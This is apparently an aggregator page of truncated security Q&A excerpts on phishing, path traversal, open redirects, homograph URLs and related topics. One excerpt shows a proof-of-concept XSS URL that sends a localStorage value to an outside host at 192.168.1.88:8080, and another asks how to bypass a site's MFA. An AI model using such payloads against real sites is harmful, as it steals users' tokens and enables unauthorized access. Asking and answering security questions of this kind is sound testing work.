Collaborate Disseminate
I don´t really understand the tech behind that. I don´t understand how the image is not changed by the ones who want to steal from you but the rest of the pgp signature match the phishing site.
The image is from a darknet market and all of… Continue reading Why do phishing attackers not alter the reference image along with the PGP signature and other content?
Real case: I am writing dictionary program and part of the data are URLs. When I set them myself, life is simple, because it is me, so I know what I do. But when I import dictionary data from somebody else those URLs put in the data are ri… Continue reading User friendly yet secure policy for using imported URLs
I am pentesting an http server using jetty, where I have access to the code.
One of the urls I am looking at is get /services/test.js
Looking at the code below:
@GET
@Path("services/{script:.+[.]js}")
@Produces(MediaT… Continue reading how to exploit pathtraversal vulnerability
Url requested:
https://site.azurewebsites.net/fky_7143_tczf_ohced.aspx?group=CON&branch=A&usr=sales@othersource.com&page=stocks/Bep_EQ32_agepbb_abfgjc_ctkdcem.aspx?veBjt=09983&bbcAddbbf=375328&bufbBfadae=67
Logged Erro… Continue reading What could this partially nonsense URL request to my site be? [duplicate]
I am searching about the open redirection attack. When I look at websites that try to explain the situation, they generally say to test the URLs in the form of www.example.com?redirection=… to see whether they go to the webpages written… Continue reading Under which situations is open redirection possible?
Our WordPress site has about 11.500 posts and (sad but true) a wild mix of internal links with and without trailing slash.
We are looking for a way to remove all trailing / from all internal links.
Does someone have a good idea?
Continue reading WordPress: How to remove trailing slash from all internal links? [closed]
I am trying to poc and XSS in the url, and I have it working fine with the below url:
https://example.com:15000/test/%3Cscript%20type=%22text/javascript%22%3Edocument.location=%22http://192.168.1.88:8080/%3fc=%22+localStorage.getItem(%22to… Continue reading + is decoded by the browser as space [closed]
In the root folder of the web server I created a folder named index.php
Does this harden the link security in the web browser?
For example, if a bad robot visited a site to spam index.php webpage will the bad robot stop because it found in… Continue reading Does naming a folder index.php harden web server security? [closed]
What is the URL located behind the security.php page?
example.com.au/security.php?magId=bZKYnrzADMv0v3o7&mob=854
If there isn’t a way to know that, is there any way to bypass this 2FA?
I enter a URL which gets redirected to the securi… Continue reading Bypassing MFA to access site [closed]
I’ve seen people in security saying URLs with Cyrillic characters are dangerous. If you ever type such characters on a browser you’d see they break into crazy unrecognizable URLs that have nothing to do with the original name.
Another atta… Continue reading Are Cyrillic characters a real threat?